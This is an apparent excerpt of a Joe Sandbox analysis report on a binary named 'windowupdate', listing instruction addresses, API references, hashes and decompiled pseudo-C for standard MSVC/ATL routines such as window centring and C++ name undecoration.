                      0x00d55fa9
                      0x00d55fb0
                      0x00d55fb9
                      0x00d55fb9
                      0x00d55fc1
                      0x00d55fc4
                      0x00d55fc9
                      0x00d55fc9
                      0x00d55fcc
                      0x00d55fd1
                      0x00d55fd3
                      0x00d55fd5
                      0x00d55fda
                      0x00d55fdd
                      0x00d55fe2
                      0x00d55fe6
                      0x00d55fe9
                      0x00d55feb
                      0x00d55feb
                      0x00d55ff1
                      0x00d55ff8
                      0x00d56001
                      0x00d56001
                      0x00d56004
                      0x00d56004
                      0x00d55fe9
                      0x00d56009
                      0x00d56009
                      0x00d5600c
                      0x00d56011
                      0x00d56013
                      0x00d56015
                      0x00d56015
                      0x00d56019
                      0x00d56019
                      0x00d5601c
                      0x00d5601c
                      0x00d56021
                      0x00d56021
                      0x00d56025
                      0x00d5602d
                      0x00000000
                      0x00d5602d
                      0x00d55f15
                      0x00d55f15
                      0x00d55f1c
                      0x00d55f27
                      0x00d55f2e
                      0x00d55f37
                      0x00d55f37
                      0x00d55f3a
                      0x00d55f3f
                      0x00d55f3f
                      0x00d55f42
                      0x00d55f47
                      0x00d55f4a
                      0x00d55f4d
                      0x00d55f51
                      0x00d55f51
                      0x00d55f54
                      0x00d55f54
                      0x00d55f5b
                      0x00d55f5b
                      0x00d55f5e
                      0x00d55f63
                      0x00d55f67
                      0x00d55f69
                      0x00d55f6c
                      0x00d55f6c
                      0x00d55f6f
                      0x00d55f74
                      0x00d55f77
                      0x00d55f79
                      0x00d55f8f
                      0x00d55f94
                      0x00d55f94
                      0x00d55f97
                      0x00000000
                      0x00d55f7b
                      0x00d55f7b
                      0x00d55f7b
                      0x00d55f7f
                      0x00d55f87
                      0x00000000
                      0x00d55f87
                      0x00000000
                      0x00d5603a
                      0x00d5603f
                      0x00d56042
                      0x00d56048
                      0x00d5604c
                      0x00d56054
                      0x00d56054
                      0x00d56057
                      0x00000000
                      0x00000000
                      0x00d56068
                      0x00d56068
                      0x00d5606d
                      0x00d56070
                      0x00d56076
                      0x00d5607a
                      0x00d56082
                      0x00d56082
                      0x00d56085
                      0x00000000
                      0x00000000
                      0x00d56061
                      0x00000000
                      0x00000000
                      0x00d5608f
                      0x00d56095
                      0x00d56098
                      0x00d5609b
                      0x00d560a3
                      0x00d560a8
                      0x00d560ab
                      0x00d560ae
                      0x00d560b2
                      0x00d56796
                      0x00d56798
                      0x00d567a0
                      0x00000000
                      0x00d567a0
                      0x00d560b8
                      0x00d560bb
                      0x00d560c2
                      0x00000000
                      0x00d560cf
                      0x00d560d2
                      0x00d560da
                      0x00d560e2
                      0x00000000
                      0x00000000
                      0x00d560ea
                      0x00d560ef
                      0x00d560f2
                      0x00d560f8
                      0x00d560fc
                      0x00d56104
                      0x00d56104
                      0x00d56107
                      0x00000000
                      0x00000000
                      0x00d56111
                      0x00d56116
                      0x00d56119
                      0x00d5611e
                      0x00d56122
                      0x00d5612a
                      0x00d56132
                      0x00000000
                      0x00000000
                      0x00d5613f
                      0x00d56144
                      0x00d56147
                      0x00d5614d
                      0x00d56151
                      0x00d56159
                      0x00d56159
                      0x00d5615f
                      0x00d56164
                      0x00d56164
                      0x00d5616a
                      0x00d5616f
                      0x00d5616f
                      0x00d56176
                      0x00d5617e
                      0x00000000
                      0x00000000
                      0x00d564dd
                      0x00d564e3
                      0x00d564e6
                      0x00d564ef
                      0x00d564f2
                      0x00d564f8
                      0x00d564fb
                      0x00d564fe
                      0x00d56502
                      0x00d56511
                      0x00d56514
                      0x00d5651b
                      0x00d56523
                      0x00000000
                      0x00d56523
                      0x00d56504
                      0x00d56508
                      0x00d5652b
                      0x00d5652f
                      0x00d56536
                      0x00d5653e
                      0x00d56544
                      0x00d56549
                      0x00d56550
                      0x00d56558
                      0x00000000
                      0x00d56558
                      0x00d56562
                      0x00d5656a
                      0x00000000
                      0x00000000
                      0x00d561c0
                      0x00d561c5
                      0x00d561c8
                      0x00d561ce
                      0x00d561d2
                      0x00d561da
                      0x00d561e2
                      0x00000000
                      0x00000000
                      0x00d5618b
                      0x00d56196
                      0x00d5619e
                      0x00d561a4
                      0x00d561a9
                      0x00d561b0
                      0x00d561b8
                      0x00000000
                      0x00000000
                      0x00d561ea
                      0x00d561ef
                      0x00d561f2
                      0x00d561f7
                      0x00d561fb
                      0x00d56203
                      0x00d5620f
                      0x00d56216
                      0x00d5621f
                      0x00d56222
                      0x00d56227
                      0x00d5622a
                      0x00d5622f
                      0x00d56231
                      0x00d56251
                      0x00d56251
                      0x00d56255
                      0x00d56259
                      0x00d56261
                      0x00000000
                      0x00d56261
                      0x00d56233
                      0x00d56236
                      0x00d5623b
                      0x00d5623d
                      0x00000000
                      0x00000000
                      0x00d56241
                      0x00d56249
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d56273
                      0x00d56278
                      0x00d5627b
                      0x00d56281
                      0x00d56285
                      0x00d5628d
                      0x00d56290
                      0x00d56295
                      0x00d5629a
                      0x00d5629d
                      0x00d562a3
                      0x00d562a7
                      0x00d562a9
                      0x00d562c1
                      0x00d562c6
                      0x00d562c9
                      0x00d562ce
                      0x00d562d2
                      0x00d562d2
                      0x00d562d5
                      0x00d562d8
                      0x00d562e0
                      0x00d562e2
                      0x00d562ea
                      0x00000000
                      0x00d562ea
                      0x00d562da
                      0x00d562de
                      0x00d562f2
                      0x00d562f5
                      0x00d562fd
                      0x00d56300
                      0x00d56305
                      0x00d5630b
                      0x00d5630e
                      0x00d56316
                      0x00d56319
                      0x00d5631e
                      0x00d56321
                      0x00d56327
                      0x00d5632a
                      0x00d5632d
                      0x00d56331
                      0x00d56496
                      0x00d56499
                      0x00d564a1
                      0x00d564a9
                      0x00000000
                      0x00d564a9
                      0x00d56337
                      0x00d5633a
                      0x00000000
                      0x00d56343
                      0x00d5634a
                      0x00d56354
                      0x00d5635b
                      0x00d56366
                      0x00d56369
                      0x00d5636d
                      0x00d56374
                      0x00d5637c
                      0x00d5637f
                      0x00d56383
                      0x00d56387
                      0x00d5638f
                      0x00000000
                      0x00000000
                      0x00d5639c
                      0x00d563a0
                      0x00d563a4
                      0x00d563ac
                      0x00d563bb
                      0x00d563c0
                      0x00d563c7
                      0x00d563ca
                      0x00d563d0
                      0x00d563d3
                      0x00d563d8
                      0x00d563e7
                      0x00d563ec
                      0x00d563f3
                      0x00d563f6
                      0x00d563fc
                      0x00d563ff
                      0x00d56404
                      0x00d56413
                      0x00d56418
                      0x00d5641f
                      0x00d56422
                      0x00d56428
                      0x00d56432
                      0x00d56441
                      0x00d56446
                      0x00d5644d
                      0x00d56450
                      0x00d56456
                      0x00d56459
                      0x00d56460
                      0x00d56464
                      0x00d5646c
                      0x00000000
                      0x00000000
                      0x00d56476
                      0x00d5647a
                      0x00d5647e
                      0x00d56486
                      0x00000000
                      0x00000000
                      0x00d5633a
                      0x00000000
                      0x00d562de
                      0x00d562ad
                      0x00d562b1
                      0x00d562b9
                      0x00000000
                      0x00000000
                      0x00d564b6
                      0x00d564bb
                      0x00d564be
                      0x00d564c4
                      0x00d564c8
                      0x00d564d0
                      0x00d564d3
                      0x00d567a5
                      0x00d567b6
                      0x00d567b6
                      0x00d567ba
                      0x00d567c6
                      0x00d567c6
                      0x00d567c9
                      0x00d567ce
                      0x00d567d0
                      0x00d567e1
                      0x00d567e7
                      0x00d567ed
                      0x00d567ed
                      0x00d567f1
                      0x00d567f1
                      0x00d567f8
                      0x00d567ff
                      0x00d56808
                      0x00d56808
                      0x00d5680b
                      0x00d5680b
                      0x00d567bc
                      0x00d567bc
                      0x00d567bc
                      0x00d567bf
                      0x00d567bf
                      0x00d56810
                      0x00d56810
                      0x00d56814
                      0x00d5681c
                      0x00000000
                      0x00000000
                      0x00d56577
                      0x00d5657c
                      0x00d5657f
                      0x00d56588
                      0x00d5658b
                      0x00d56591
                      0x00d56594
                      0x00d5659a
                      0x00d5659d
                      0x00d565a0
                      0x00d565a4
                      0x00d56784
                      0x00d5678c
                      0x00000000
                      0x00d5678c
                      0x00d565aa
                      0x00d565ad
                      0x00000000
                      0x00d565b4
                      0x00d565b9
                      0x00d565bc
                      0x00d565c2
                      0x00d565c6
                      0x00d565ce
                      0x00d565d6
                      0x00000000
                      0x00000000
                      0x00d565de
                      0x00d565e3
                      0x00d565e6
                      0x00d565ec
                      0x00d565f0
                      0x00d565f8
                      0x00d565fb
                      0x00d56600
                      0x00d56606
                      0x00d56609
                      0x00d5660c
                      0x00d56643
                      0x00d5664a
                      0x00d56653
                      0x00d56656
                      0x00d5660e
                      0x00d56615
                      0x00d5661e
                      0x00d56621
                      0x00d56626
                      0x00d5662c
                      0x00d5662f
                      0x00d56632
                      0x00d56634
                      0x00d56639
                      0x00d56639
                      0x00d5663c
                      0x00d5663c
                      0x00d56641
                      0x00d5666a
                      0x00d56670
                      0x00d56676
                      0x00d5667d
                      0x00d56685
                      0x00d56689
                      0x00d56691
                      0x00000000
                      0x00000000
                      0x00d5669e
                      0x00d566a3
                      0x00d566a3
                      0x00d566a6
                      0x00d566ab
                      0x00d566af
                      0x00d566b7
                      0x00d566bd
                      0x00d566c2
                      0x00d566c2
                      0x00d566c7
                      0x00d566ca
                      0x00d566cc
                      0x00000000
                      0x00000000
                      0x00d566ce
                      0x00d566d4
                      0x00d566d7
                      0x00d566da
                      0x00000000
                      0x00000000
                      0x00d566dc
                      0x00d566e4
                      0x00d566ec
                      0x00d566ef
                      0x00d566f4
                      0x00d566f9
                      0x00d566ff
                      0x00d566ff
                      0x00d56706
                      0x00d5670c
                      0x00d5670f
                      0x00d56712
                      0x00d56714
                      0x00d5671a
                      0x00d5671a
                      0x00d5671d
                      0x00d5671d
                      0x00d56723
                      0x00d5672a
                      0x00d56732
                      0x00000000
                      0x00000000
                      0x00d5673c
                      0x00d56741
                      0x00d56744
                      0x00d5674d
                      0x00d56750
                      0x00d56756
                      0x00d5675a
                      0x00d56772
                      0x00d5677a
                      0x00000000
                      0x00d5677a
                      0x00d56760
                      0x00d56768
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000

                      APIs
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D55E8C
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D55E94
                      • DName::DName.LIBVCRUNTIMED ref: 00D55EF4
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D55F04
                      • operator+.LIBVCRUNTIMED ref: 00D55F2E
                      • DName::operator+=.LIBCMTD ref: 00D55F54
                      • DName::operator+=.LIBCMTD ref: 00D55F5E
                      • Mailbox.LIBCMTD ref: 00D55F82
                      • DName::DName.LIBVCRUNTIMED ref: 00D560DD
                      • DName::DName.LIBVCRUNTIMED ref: 00D567AC
                      • DName::setIsUDC.LIBCMTD ref: 00D567BF
                      • DName::isEmpty.LIBCMTD ref: 00D567C9
                      • operator+.LIBVCRUNTIMED ref: 00D567FF
                      • Mailbox.LIBCMTD ref: 00D5680B
                      • Mailbox.LIBCMTD ref: 00D56817
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Iterator_baseIterator_base::_MailboxNameName::std::_$Name::operator+=operator+$EmptyName::isName::set
                      • String ID: _$operator
                      • API String ID: 2065213285-3322683124
                      • Opcode ID: cf30efdd80b62d11f4a8ccc7dd9c91664884c98621e047e16abf77dfd2ac49b0
                      • Instruction ID: 5769d35c424a186be787e3a703d5749ccf2584a1c5351038c1a5eb10a70d4634
                      • Opcode Fuzzy Hash: cf30efdd80b62d11f4a8ccc7dd9c91664884c98621e047e16abf77dfd2ac49b0
                      • Instruction Fuzzy Hash: F9A190719001199BDB18EF64D891EED7F75FF44301F448169ED069B2A2EB30AA49DBB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D44E60 Relevance: 42.4, APIs: 17, Strings: 7, Instructions: 361COMMON
                      Download Yara Rule
                      C-Code - Quality: 76%
                      			E00D44E60(void* __ebx, void* __ecx, void* __edi, void* __esi, struct HWND__* _a4) {
				signed int _v8;
				struct HWND__** _v12;
				signed int _v16;
				struct tagRECT _v36;
				struct tagRECT _v60;
				struct tagRECT _v84;
				struct HWND__* _v92;
				signed int _v96;
				struct HMONITOR__* _v100;
				struct HWND__* _v104;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				struct tagMONITORINFO _v148;
				struct HWND__* _v156;
				int _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				int _v172;
				int _v176;
				struct HWND__* _v180;
				int _v184;
				signed int _t117;
				void* _t121;
				struct HWND__* _t127;
				int _t129;
				int _t131;
				int _t134;
				int _t137;
				int _t140;
				int _t157;
				void* _t158;
				void* _t160;
				int _t165;
				void* _t166;
				void* _t167;
				int _t171;
				void* _t173;
				int _t175;
				void* _t179;
				struct HWND__* _t187;
				void* _t191;
				void* _t192;
				struct HWND__** _t196;
				int _t218;
				int _t231;
				intOrPtr _t237;
				void* _t242;
				void* _t251;
				void* _t252;
				signed int _t267;
				void* _t268;
				void* _t269;

				_t192 = __ebx;
				_push(__ecx);
				_t251 =  &_v184;
				memset(_t251, 0xcccccccc, 0x2d << 2);
				_t269 = _t268 + 0xc;
				_t252 = _t251 + 0x2d;
				_pop(_t196);
				_t117 =  *0xdf600c; // 0x71e60372
				_v8 = _t117 ^ _t267;
				_v12 = _t196;
				_t254 = _t269;
				_t121 = E00DC1520(IsWindow( *_v12), _t269 - _t269);
				_t272 = _t121;
				if(_t121 == 0) {
					_t191 = L00D84930(_t272, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0x812, 0, "%ls", L"::IsWindow(m_hWnd)");
					_t269 = _t269 + 0x18;
					if(_t191 == 1) {
						asm("int3");
					}
				}
				_v16 = E00D44DE0(_v12, _t254);
				if(_a4 == 0) {
					if((_v16 & 0x40000000) == 0) {
						_t187 = GetWindow( *_v12, 4);
						__eflags = _t269 - _t269;
						_a4 = E00DC1520(_t187, __eflags);
					} else {
						_a4 = E00DC1520(GetParent( *_v12), _t269 - _t269);
					}
				}
				_t125 = E00DC1520(GetWindowRect( *_v12,  &_v36), _t269 - _t269);
				_t231 = _v16 & 0x40000000;
				if(_t231 != 0) {
					_t127 = GetParent( *_v12);
					__eflags = _t269 - _t269;
					_v92 = E00DC1520(_t127, _t269 - _t269);
					_t129 = IsWindow(_v92);
					__eflags = _t269 - _t269;
					__eflags = E00DC1520(_t129, _t269 - _t269);
					if(__eflags == 0) {
						_t167 = L00D84930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0x84a, 0, "%ls", L"::IsWindow(hWndParent)");
						_t269 = _t269 + 0x18;
						__eflags = _t167 - 1;
						if(_t167 == 1) {
							asm("int3");
						}
					}
					_t131 = GetClientRect(_v92,  &_v60);
					__eflags = _t269 - _t269;
					E00DC1520(_t131, _t269 - _t269);
					_t134 = IsWindow(_a4);
					__eflags = _t269 - _t269;
					__eflags = E00DC1520(_t134, _t269 - _t269);
					if(__eflags == 0) {
						_t166 = L00D84930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0x84d, 0, "%ls", L"::IsWindow(hWndCenter)");
						_t269 = _t269 + 0x18;
						__eflags = _t166 - 1;
						if(_t166 == 1) {
							asm("int3");
						}
					}
					_t137 = GetClientRect(_a4,  &_v84);
					__eflags = _t269 - _t269;
					E00DC1520(_t137, _t269 - _t269);
					_t140 = MapWindowPoints(_a4, _v92,  &_v84, 2);
					__eflags = _t269 - _t269;
					E00DC1520(_t140, _t269 - _t269);
					L45:
					_v164 = _v36.right - _v36.left;
					_t237 = _v36.bottom - _v36.top;
					_v168 = _t237;
					asm("cdq");
					asm("cdq");
					_v172 = (_v84.left + _v84.right - _t237 >> 1) - (_v164 - _t237 >> 1);
					asm("cdq");
					asm("cdq");
					_v176 = (_v84.top + _v84.bottom - _t237 >> 1) - (_v168 - _t237 >> 1);
					__eflags = _v172 + _v164 - _v60.right;
					if(_v172 + _v164 > _v60.right) {
						_t165 = _v60.right - _v164;
						__eflags = _t165;
						_v172 = _t165;
					}
					__eflags = _v172 - _v60.left;
					if(_v172 < _v60.left) {
						_v172 = _v60.left;
					}
					__eflags = _v176 + _v168 - _v60.bottom;
					if(_v176 + _v168 > _v60.bottom) {
						_t218 = _v60.bottom - _v168;
						__eflags = _t218;
						_v176 = _t218;
					}
					__eflags = _v176 - _v60.top;
					if(_v176 < _v60.top) {
						_v176 = _v60.top;
					}
					_t262 = _t269;
					_t231 = _v172;
					_t157 = SetWindowPos( *_v12, 0, _t231, _v176, 0xffffffff, 0xffffffff, 0x15);
					__eflags = _t269 - _t269;
					_t158 = E00DC1520(_t157, _t269 - _t269);
					L54:
					E00DC14C0(_t267, 0xd45304);
					_t160 = _t158;
					_t242 = _t231;
					return E00DC1520(E00D47280(_t160, _t192, _v8 ^ _t267, _t242, _t252, _t262), _t267 - _t269 + 0xb4);
				}
				if(_a4 == 0) {
					L12:
					_v100 = 0;
					if(_a4 == 0) {
						_t262 = _t269;
						_t231 =  *_v12;
						__imp__MonitorFromWindow(_t231, 2);
						__eflags = _t269 - _t269;
						_v100 = E00DC1520(_t125, __eflags);
					} else {
						_t262 = _t269;
						__imp__MonitorFromWindow(_a4, 2);
						_v100 = E00DC1520(_a4, _t269 - _t269);
					}
					do {
						if(_v100 == 0) {
							_v180 = 0;
						} else {
							_v180 = 1;
						}
						_v104 = _v180;
						_t286 = _v104;
						if(_v104 == 0) {
							_t179 = L00D84930(_t286, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0x838, 0, "%ls", L"__atl_condVal");
							_t269 = _t269 + 0x18;
							if(_t179 == 1) {
								asm("int3");
							}
						}
						if(_v104 == 0) {
							_t158 = 0;
							goto L54;
						}
						_t231 = 0;
						__eflags = 0;
					} while (0 != 0);
					_v148.cbSize = 0x28;
					_t262 = _t269;
					_t171 = GetMonitorInfoA(_v100,  &_v148);
					__eflags = _t269 - _t269;
					_v156 = E00DC1520(_t171, _t269 - _t269);
					while(1) {
						__eflags = _v156;
						if(_v156 == 0) {
							_v184 = 0;
						} else {
							_v184 = 1;
						}
						_t231 = _v184;
						_v160 = _t231;
						__eflags = _v160;
						if(__eflags == 0) {
							_t173 = L00D84930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0x83d, 0, "%ls", L"__atl_condVal");
							_t269 = _t269 + 0x18;
							__eflags = _t173 - 1;
							if(_t173 == 1) {
								asm("int3");
							}
						}
						__eflags = _v160;
						if(_v160 == 0) {
							break;
						}
						__eflags = 0;
						if(0 != 0) {
							continue;
						}
						_v60.left = _v148.rcWork;
						_v60.top = _v124;
						_v60.right = _v120;
						_v60.bottom = _v116;
						__eflags = _a4;
						if(_a4 != 0) {
							_t175 = GetWindowRect(_a4,  &_v84);
							__eflags = _t269 - _t269;
							E00DC1520(_t175, _t269 - _t269);
						} else {
							_v84.left = _v60.left;
							_v84.top = _v60.top;
							_v84.right = _v60.right;
							_v84.bottom = _v60.bottom;
						}
						goto L45;
					}
					_t158 = 0;
					goto L54;
				}
				_v96 = E00DC1520(GetWindowLongA(_a4, 0xfffffff0), _t269 - _t269);
				if((_v96 & 0x10000000) == 0) {
					L11:
					_a4 = 0;
					goto L12;
				}
				_t231 = _v96 & 0x20000000;
				if(_t231 == 0) {
					goto L12;
				}
				goto L11;
			}
























































                      0x00d44e60
                      0x00d44e6b
                      0x00d44e6c
                      0x00d44e7c
                      0x00d44e7c
                      0x00d44e7c
                      0x00d44e7e
                      0x00d44e7f
                      0x00d44e86
                      0x00d44e89
                      0x00d44e8c
                      0x00d44e9c
                      0x00d44ea1
                      0x00d44ea3
                      0x00d44ebd
                      0x00d44ec2
                      0x00d44ec8
                      0x00d44eca
                      0x00d44eca
                      0x00d44ec8
                      0x00d44ed3
                      0x00d44eda
                      0x00d44ee4
                      0x00d44f0a
                      0x00d44f10
                      0x00d44f17
                      0x00d44ee6
                      0x00d44efb
                      0x00d44efb
                      0x00d44ee4
                      0x00d44f2e
                      0x00d44f36
                      0x00d44f3c
                      0x00d45114
                      0x00d4511a
                      0x00d45121
                      0x00d4512a
                      0x00d45130
                      0x00d45137
                      0x00d45139
                      0x00d45153
                      0x00d45158
                      0x00d4515b
                      0x00d4515e
                      0x00d45160
                      0x00d45160
                      0x00d4515e
                      0x00d4516b
                      0x00d45171
                      0x00d45173
                      0x00d4517e
                      0x00d45184
                      0x00d4518b
                      0x00d4518d
                      0x00d451a7
                      0x00d451ac
                      0x00d451af
                      0x00d451b2
                      0x00d451b4
                      0x00d451b4
                      0x00d451b2
                      0x00d451bf
                      0x00d451c5
                      0x00d451c7
                      0x00d451dc
                      0x00d451e2
                      0x00d451e4
                      0x00d451e9
                      0x00d451ef
                      0x00d451f8
                      0x00d451fb
                      0x00d45207
                      0x00d45214
                      0x00d4521b
                      0x00d45227
                      0x00d45234
                      0x00d4523b
                      0x00d4524d
                      0x00d45250
                      0x00d45255
                      0x00d45255
                      0x00d4525b
                      0x00d4525b
                      0x00d45267
                      0x00d4526a
                      0x00d4526f
                      0x00d4526f
                      0x00d45281
                      0x00d45284
                      0x00d45289
                      0x00d45289
                      0x00d4528f
                      0x00d4528f
                      0x00d4529b
                      0x00d4529e
                      0x00d452a3
                      0x00d452a3
                      0x00d452a9
                      0x00d452b8
                      0x00d452c7
                      0x00d452cd
                      0x00d452cf
                      0x00d452d4
                      0x00d452de
                      0x00d452e3
                      0x00d452e4
                      0x00d45301
                      0x00d45301
                      0x00d44f46
                      0x00d44f7d
                      0x00d44f7d
                      0x00d44f88
                      0x00d44fa4
                      0x00d44fab
                      0x00d44fae
                      0x00d44fb4
                      0x00d44fbb
                      0x00d44f8a
                      0x00d44f8a
                      0x00d44f92
                      0x00d44f9f
                      0x00d44f9f
                      0x00d44fbe
                      0x00d44fc2
                      0x00d44fd0
                      0x00d44fc4
                      0x00d44fc4
                      0x00d44fc4
                      0x00d44fe0
                      0x00d44fe3
                      0x00d44fe7
                      0x00d45001
                      0x00d45006
                      0x00d4500c
                      0x00d4500e
                      0x00d4500e
                      0x00d4500c
                      0x00d45013
                      0x00d45015
                      0x00000000
                      0x00d45015
                      0x00d4501c
                      0x00d4501c
                      0x00d4501c
                      0x00d45020
                      0x00d4502a
                      0x00d45037
                      0x00d4503d
                      0x00d45044
                      0x00d4504a
                      0x00d4504a
                      0x00d45051
                      0x00d4505f
                      0x00d45053
                      0x00d45053
                      0x00d45053
                      0x00d45069
                      0x00d4506f
                      0x00d45075
                      0x00d4507c
                      0x00d45096
                      0x00d4509b
                      0x00d4509e
                      0x00d450a1
                      0x00d450a3
                      0x00d450a3
                      0x00d450a1
                      0x00d450a4
                      0x00d450ab
                      0x00000000
                      0x00000000
                      0x00d450b4
                      0x00d450b6
                      0x00000000
                      0x00000000
                      0x00d450bb
                      0x00d450c1
                      0x00d450c7
                      0x00d450cd
                      0x00d450d0
                      0x00d450d4
                      0x00d450fa
                      0x00d45100
                      0x00d45102
                      0x00d450d6
                      0x00d450d9
                      0x00d450df
                      0x00d450e5
                      0x00d450eb
                      0x00d450eb
                      0x00000000
                      0x00d45107
                      0x00d450ad
                      0x00000000
                      0x00d450ad
                      0x00d44f5d
                      0x00d44f69
                      0x00d44f76
                      0x00d44f76
                      0x00000000
                      0x00d44f76
                      0x00d44f6e
                      0x00d44f74
                      0x00000000
                      0x00000000
                      0x00000000

                      APIs
                      • IsWindow.USER32 ref: 00D44E94
                      • GetParent.USER32 ref: 00D44EEE
                      • GetWindow.USER32(?,00000004), ref: 00D44F0A
                      • GetWindowRect.USER32 ref: 00D44F26
                      • GetWindowLongA.USER32 ref: 00D44F50
                      • MonitorFromWindow.USER32(00000000,00000002), ref: 00D44F92
                      • MonitorFromWindow.USER32(?,00000002), ref: 00D44FAE
                      • GetMonitorInfoA.USER32 ref: 00D45037
                      • GetWindowRect.USER32 ref: 00D450FA
                      • GetParent.USER32 ref: 00D45114
                      • IsWindow.USER32(?), ref: 00D4512A
                      • GetClientRect.USER32 ref: 00D4516B
                      • IsWindow.USER32(00000000), ref: 00D4517E
                      • GetClientRect.USER32 ref: 00D451BF
                      • MapWindowPoints.USER32 ref: 00D451DC
                      • SetWindowPos.USER32(?,00000000,?,?,000000FF,000000FF,00000015,?,?,?), ref: 00D452C7
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D452DE
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Window$Rect$Monitor$ClientFromParent$CheckInfoLongPointsStackVars@8
                      • String ID: %ls$($::IsWindow(hWndCenter)$::IsWindow(hWndParent)$::IsWindow(m_hWnd)$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h$__atl_condVal
                      • API String ID: 1557619299-489089659
                      • Opcode ID: 4da4b40ada9b12289e159a61fe7bd20a984f9b46e95695aa934aaf0f59e9e997
                      • Instruction ID: e4b92badaa4aea6943a1b7a1c60fbf552a3a1f6431f85efa8740e4261bc45064
                      • Opcode Fuzzy Hash: 4da4b40ada9b12289e159a61fe7bd20a984f9b46e95695aa934aaf0f59e9e997
                      • Instruction Fuzzy Hash: 94D14175E00319AFCB24EFA8D886B9DB7B1EF45310F148258F509AB286D7749D84CFA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D56AB0 Relevance: 42.3, APIs: 19, Strings: 5, Instructions: 276COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D56AB0(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				char _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v76;
				char _v84;
				char _v92;
				char _v100;
				signed int _t93;

				E00D4F3F0( &_v20);
				_t93 =  *0xf20640; // 0x0
				_v8 =  *_t93;
				if(_v8 > 0x42) {
					L28:
					E00D52CD0(_a4, _a8);
					return _a4;
				}
				_t5 = _v8 + 0xd56e6c; // 0x6e189003
				switch( *((intOrPtr*)(( *_t5 & 0x000000ff) * 4 +  &M00D56E58))) {
					case 0:
						E00D4FB00(_t112, _a4, 1, _a8);
						return _a4;
					case 1:
						1 = 1 << 0;
						__ecx =  *0xf20640; // 0x0
						__edx =  *((char*)(__ecx + (1 << 0)));
						__eflags =  *((char*)(__ecx + (1 << 0))) - 0x24;
						if( *((char*)(__ecx + (1 << 0))) == 0x24) {
							__edx =  *0xf20640; // 0x0
							 *0xf20640 = __edx;
							__eax =  *0xf20640; // 0x0
							__ecx =  *__eax;
							_v12 =  *__eax;
							__eflags = _v12 - 0x59;
							if(__eflags > 0) {
								L27:
								__ecx = _a4;
								E00D4F350(_a4, 2) = _a4;
								return _a4;
							}
							_t36 = _v12 + 0xd56edc; // 0xcccccc09
							__eax =  *_t36 & 0x000000ff;
							switch( *((intOrPtr*)(( *_t36 & 0x000000ff) * 4 +  &M00D56EB0))) {
								case 0:
									__eax = _a8;
									__ecx = _a4;
